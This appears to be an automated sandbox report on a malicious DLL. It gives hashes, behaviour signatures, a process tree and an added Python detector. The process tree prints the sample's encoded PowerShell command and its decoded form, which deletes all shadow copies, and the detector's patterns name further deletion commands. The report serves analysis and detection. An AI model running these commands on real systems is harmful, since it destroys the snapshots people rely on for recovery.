Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system -
submitted
16-05-2024 01:50
Behavioral task
behavioral1
Sample
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
Resource
win10v2004-20240426-en
General
-
Target
4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll
-
Size
164KB
-
MD5
4903f3effb98da65c49bb9591c16615d
-
SHA1
d53e85991420c1475385babd72d31ee77faefc6d
-
SHA256
42996516b6604ba136ff909d9b59d2a676a72eaafa30c729cdfaddd96b20fc83
-
SHA512
454b8a5f3528ce77d993b84ccd0df7b8f0843a6a47516b1aa13fe6cbb79d1853646e03c7c9663266df154fd464f594d41be1e392d0c8c3dd676e4348e5149880
-
SSDEEP
3072:BrX1t2U05pbJ5xhxY9doh7O79siUs/NaDn3Ka9:BrltH05f5v2i7O93Nenaa9
Malware Config
Signatures
-
Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exe (PID 2248) opened the following drive roots read-only, in this order: \??\G:, \??\J:, \??\M:, \??\U:, \??\W:, \??\X:, \??\Y:, \??\B:, \??\H:, \??\I:, \??\T:, \??\V:, \??\Z:, \??\A:, \??\R:, \??\S:, \??\L:, \??\K:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\E:
That is every letter from A: to Z: except C:, D: and F:. Probing every drive root immediately before deleting the shadow copies (see below) is the preparation pattern typical of ransomware locating volumes to encrypt; no file-modification signature appears in this report, so treat the pairing as context rather than a verdict. -
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
pid 2248 rundll32.exe; pid 2268 powershell.exe -
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
Token: SeDebugPrivilege, pid 2268 powershell.exe
Token: SeBackupPrivilege, pid 2616 vssvc.exe
Token: SeRestorePrivilege, pid 2616 vssvc.exe
Token: SeAuditPrivilege, pid 2616 vssvc.exe
The three vssvc.exe entries are the backup and restore privileges the Volume Shadow Copy service enables whenever it services a snapshot request; they are a side effect of the shadow-copy deletion, not sample code running inside vssvc.exe. -
Suspicious use of WriteProcessMemory (11 IoCs)
Processes:
PID 1084 rundll32.exe wrote to memory of 2248 rundll32.exe (7 writes)
PID 2248 rundll32.exe wrote to memory of 2268 powershell.exe (4 writes)
Both pairs are the parent-to-child relationships in the process tree below, so these writes are consistent with each parent setting up the child it had just spawned rather than with injection into an unrelated process. -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. In this run the access is destructive: the encoded powershell.exe command line in the process tree below deletes every Win32_Shadowcopy instance, which is why vssvc.exe starts and enables its backup/restore privileges.
Processes
-
- C:\Windows\system32\rundll32.exe (PID 1084, depth 1)
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#1
  (loads the sample and calls its export at ordinal #1; a 64-bit rundll32 given a 32-bit DLL hands it off to the SysWOW64 copy, which is what produces the child below)
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 2248, depth 2)
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2268, depth 3)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This deletes every Volume Shadow Copy on the host (ATT&CK T1490, Inhibit System Recovery), removing the snapshots a user or administrator would otherwise restore from.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 1720, depth 1)
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
  (the WMI callback sink host, started by COM; consistent with the WMI query issued by PID 2268)
- C:\Windows\system32\vssvc.exe (PID 2616, depth 1)
  C:\Windows\system32\vssvc.exe
  (the Volume Shadow Copy service, started on demand to service the Delete() calls)
  - Suspicious use of AdjustPrivilegeToken
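The encoded command in the process tree above is this report's only direct evidence of what the DLL does once loaded, so an analyst wants to decode it and turn the pattern into a detection. The following Python is an example added here, not code from the sandbox or from the sample's author: it decodes a `powershell -e` argument (base64 of UTF-16LE text, the encoding PowerShell uses for -EncodedCommand), checks the plaintext for shadow-copy deletion, and runs that check over a list of process-creation events constructed from the PIDs, images and command lines in the tree above. The `EVENTS` list and its field names (`pid`, `ppid`, `image`, `cmd`) are my own layout, not a sandbox export format.

```python
"""Decode PowerShell -EncodedCommand payloads and flag shadow-copy tampering.

Added example. EVENTS is constructed from the process tree in the report
(PIDs, images and command lines as the sandbox showed them); it is not a
log the sandbox produced.
"""
import base64
import re

# The -e payload from PID 2268 in the tree above (copied verbatim).
ENCODED = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBw"
    "AHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQA"
    "ZQAoACkAOwB9AA=="
)

# Constructed process-creation events (ppid 0 = parent not in the tree).
EVENTS = [
    {"pid": 1084, "ppid": 0, "image": r"C:\Windows\system32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#1"},
    {"pid": 2248, "ppid": 1084, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\4903f3effb98da65c49bb9591c16615d_JaffaCakes118.dll,#1"},
    {"pid": 2268, "ppid": 2248, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -e " + ENCODED},
    {"pid": 1720, "ppid": 0, "image": r"C:\Windows\system32\wbem\unsecapp.exe",
     "cmd": r"C:\Windows\system32\wbem\unsecapp.exe -Embedding"},
    {"pid": 2616, "ppid": 0, "image": r"C:\Windows\system32\vssvc.exe",
     "cmd": r"C:\Windows\system32\vssvc.exe"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e is special-cased.
ENCODED_SWITCHES = {"e", "ec", "enc", "encoded", "encodedcommand"}


def decode_encoded_command(cmdline):
    """Return the plaintext of a powershell -e/-EncodedCommand argument, or None.

    The argument is base64 of the script as UTF-16LE. Anything that is not
    valid base64 or not valid UTF-16LE is reported as 'no encoded command'.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] not in "-/" or flag[1:].lower() not in ENCODED_SWITCHES:
            continue
        try:
            raw = base64.b64decode(value, validate=True)
            return raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            return None
    return None


# Shadow-copy deletion (ATT&CK T1490) as it appears on a command line or in a script.
SHADOW_TAMPER = [
    re.compile(r"win32_shadowcopy.*delete", re.I | re.S),  # WMI class + Delete(), as above
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]


def tampers_with_shadow_copies(text):
    """True if the command text deletes Volume Shadow Copies."""
    return any(p.search(text) for p in SHADOW_TAMPER)


def suspicious_chains(events):
    """Flag powershell.exe processes whose (decoded) command line deletes shadow
    copies, recording the parent image so the chain can be ranked."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\powershell.exe"):
            continue
        decoded = decode_encoded_command(e["cmd"])
        text = decoded if decoded is not None else e["cmd"]
        if not tampers_with_shadow_copies(text):
            continue
        parent = by_pid.get(e["ppid"])
        hits.append({
            "pid": e["pid"],
            "parent_image": parent["image"] if parent else None,
            "encoded": decoded is not None,
            "command": text,
        })
    return hits


if __name__ == "__main__":
    for hit in suspicious_chains(EVENTS):
        print(f"PID {hit['pid']} (parent {hit['parent_image']}) "
              f"encoded={hit['encoded']}: {hit['command']}")
```

Running it reports the single hit, PID 2268 under rundll32.exe. The parent image is kept in the result on purpose: the same decoded command typed by an administrator cleaning up disk space is legitimate, whereas a rundll32.exe, wscript.exe or Office parent is not, so rank on the parent rather than suppressing the rule.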
Network
MITRE ATT&CK Enterprise v15
Downloads
All memory dumps come from PID 2268 (powershell.exe); the 9.6MB range 0x000007FEF4AA0000-0x000007FEF543D000 was captured six times (dumps 7 through 12).
- memory/2268-4-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp, Filesize 4KB
- memory/2268-5-0x000000001B1F0000-0x000000001B4D2000-memory.dmp, Filesize 2.9MB
- memory/2268-6-0x0000000001E60000-0x0000000001E68000-memory.dmp, Filesize 32KB
- memory/2268-7-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB
- memory/2268-8-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB
- memory/2268-9-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB
- memory/2268-10-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB
- memory/2268-11-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB
- memory/2268-12-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp, Filesize 9.6MB